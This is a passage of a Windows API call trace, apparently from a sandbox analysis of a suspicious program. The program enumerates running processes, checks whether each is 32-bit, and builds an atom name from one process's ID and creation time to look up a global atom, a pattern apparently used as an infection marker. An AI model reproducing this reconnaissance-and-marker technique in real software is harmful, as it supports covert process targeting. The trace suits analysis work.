	[0107.155] CloseHandle (hObject=0x694) returned 1
	[0107.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0107.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0107.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0107.156] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.156] CloseHandle (hObject=0x694) returned 1
	[0107.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0107.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0107.156] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.156] CloseHandle (hObject=0x694) returned 1
	[0107.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0107.156] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.156] CloseHandle (hObject=0x694) returned 1
	[0107.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0107.157] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.157] CloseHandle (hObject=0x694) returned 1
	[0107.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0107.157] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.157] CloseHandle (hObject=0x694) returned 1
	[0107.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0107.157] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.157] CloseHandle (hObject=0x694) returned 1
	[0107.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0107.157] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.157] CloseHandle (hObject=0x694) returned 1
	[0107.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0107.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0107.158] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.158] CloseHandle (hObject=0x694) returned 1
	[0107.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0107.158] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.158] CloseHandle (hObject=0x694) returned 1
	[0107.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0107.158] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.158] CloseHandle (hObject=0x694) returned 1
	[0107.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0107.158] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.158] CloseHandle (hObject=0x694) returned 1
	[0107.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0107.158] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.158] CloseHandle (hObject=0x694) returned 1
	[0107.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0107.159] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.159] CloseHandle (hObject=0x694) returned 1
	[0107.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0107.159] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.159] CloseHandle (hObject=0x694) returned 1
	[0107.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0107.159] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.159] CloseHandle (hObject=0x694) returned 1
	[0107.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0107.159] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.159] CloseHandle (hObject=0x694) returned 1
	[0107.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0107.159] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.159] CloseHandle (hObject=0x694) returned 1
	[0107.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0107.160] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.160] CloseHandle (hObject=0x694) returned 1
	[0107.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0107.160] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.160] CloseHandle (hObject=0x694) returned 1
	[0107.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0107.160] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.160] CloseHandle (hObject=0x694) returned 1
	[0107.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0107.160] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.160] CloseHandle (hObject=0x694) returned 1
	[0107.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0107.160] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.160] CloseHandle (hObject=0x694) returned 1
	[0107.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0107.161] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.161] CloseHandle (hObject=0x694) returned 1
	[0107.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0107.161] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.161] CloseHandle (hObject=0x694) returned 1
	[0107.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0107.161] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.161] CloseHandle (hObject=0x694) returned 1
	[0107.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0107.161] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.161] CloseHandle (hObject=0x694) returned 1
	[0107.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0107.162] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.162] CloseHandle (hObject=0x694) returned 1
	[0107.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0107.162] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.162] CloseHandle (hObject=0x694) returned 1
	[0107.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0107.162] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.162] CloseHandle (hObject=0x694) returned 1
	[0107.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.162] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.162] CloseHandle (hObject=0x694) returned 1
	[0107.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.163] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.163] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0107.163] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0107.163] wsprintfA (in: param_1=0x3993268, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0107.163] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.164] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0107.164] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.164] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0107.164] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0107.164] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0107.164] CloseHandle (hObject=0x694) returned 1
	[0107.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0107.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0107.164] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.164] CloseHandle (hObject=0x694) returned 1
	[0107.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0107.165] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.165] CloseHandle (hObject=0x694) returned 1
	[0107.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0107.165] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.165] CloseHandle (hObject=0x694) returned 1
	[0107.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0107.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0107.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0107.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0107.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0107.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0107.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0107.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0107.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0107.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0107.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0107.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0107.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0107.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0107.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0107.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0107.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0107.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0107.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0107.211] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.211] CloseHandle (hObject=0x694) returned 1
	[0107.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0107.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0107.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0107.212] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.212] CloseHandle (hObject=0x694) returned 1
	[0107.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0107.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0107.212] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.212] CloseHandle (hObject=0x694) returned 1
	[0107.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0107.212] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.212] CloseHandle (hObject=0x694) returned 1
	[0107.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0107.213] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.213] CloseHandle (hObject=0x694) returned 1
	[0107.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0107.213] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.213] CloseHandle (hObject=0x694) returned 1
	[0107.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0107.213] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.213] CloseHandle (hObject=0x694) returned 1
	[0107.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0107.213] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.213] CloseHandle (hObject=0x694) returned 1
	[0107.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0107.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0107.214] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.214] CloseHandle (hObject=0x694) returned 1
	[0107.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0107.214] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.214] CloseHandle (hObject=0x694) returned 1
	[0107.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0107.214] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.214] CloseHandle (hObject=0x694) returned 1
	[0107.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0107.214] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.214] CloseHandle (hObject=0x694) returned 1
	[0107.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0107.214] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.214] CloseHandle (hObject=0x694) returned 1
	[0107.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0107.215] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.215] CloseHandle (hObject=0x694) returned 1
	[0107.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0107.215] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.215] CloseHandle (hObject=0x694) returned 1
	[0107.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0107.215] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.215] CloseHandle (hObject=0x694) returned 1
	[0107.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0107.215] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.215] CloseHandle (hObject=0x694) returned 1
	[0107.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0107.215] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.215] CloseHandle (hObject=0x694) returned 1
	[0107.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0107.215] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.216] CloseHandle (hObject=0x694) returned 1
	[0107.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0107.216] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.216] CloseHandle (hObject=0x694) returned 1
	[0107.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0107.216] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.216] CloseHandle (hObject=0x694) returned 1
	[0107.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0107.216] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.216] CloseHandle (hObject=0x694) returned 1
	[0107.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0107.216] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.216] CloseHandle (hObject=0x694) returned 1
	[0107.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0107.217] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.217] CloseHandle (hObject=0x694) returned 1
	[0107.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0107.217] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.217] CloseHandle (hObject=0x694) returned 1
	[0107.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0107.217] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.217] CloseHandle (hObject=0x694) returned 1
	[0107.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0107.217] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.217] CloseHandle (hObject=0x694) returned 1
	[0107.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0107.217] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.217] CloseHandle (hObject=0x694) returned 1
	[0107.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0107.217] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.218] CloseHandle (hObject=0x694) returned 1
	[0107.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0107.218] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.218] CloseHandle (hObject=0x694) returned 1
	[0107.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.218] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.218] CloseHandle (hObject=0x694) returned 1
	[0107.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.218] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.219] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0107.219] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0107.219] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0107.219] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.219] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0107.219] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.220] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0107.220] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0107.220] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0107.220] CloseHandle (hObject=0x694) returned 1
	[0107.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0107.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0107.220] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.220] CloseHandle (hObject=0x694) returned 1
	[0107.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0107.220] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.220] CloseHandle (hObject=0x694) returned 1
	[0107.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0107.220] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.220] CloseHandle (hObject=0x694) returned 1
	[0107.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0107.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0107.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0107.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0107.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0107.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0107.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0107.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0107.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0107.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0107.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0107.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0107.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0107.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0107.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0107.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0107.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0107.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0107.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0107.259] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.259] CloseHandle (hObject=0x694) returned 1
	[0107.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0107.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0107.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0107.260] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.260] CloseHandle (hObject=0x694) returned 1
	[0107.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0107.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0107.260] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.260] CloseHandle (hObject=0x694) returned 1
	[0107.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0107.260] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.260] CloseHandle (hObject=0x694) returned 1
	[0107.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0107.260] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.260] CloseHandle (hObject=0x694) returned 1
	[0107.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0107.260] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.260] CloseHandle (hObject=0x694) returned 1
	[0107.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0107.261] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.261] CloseHandle (hObject=0x694) returned 1
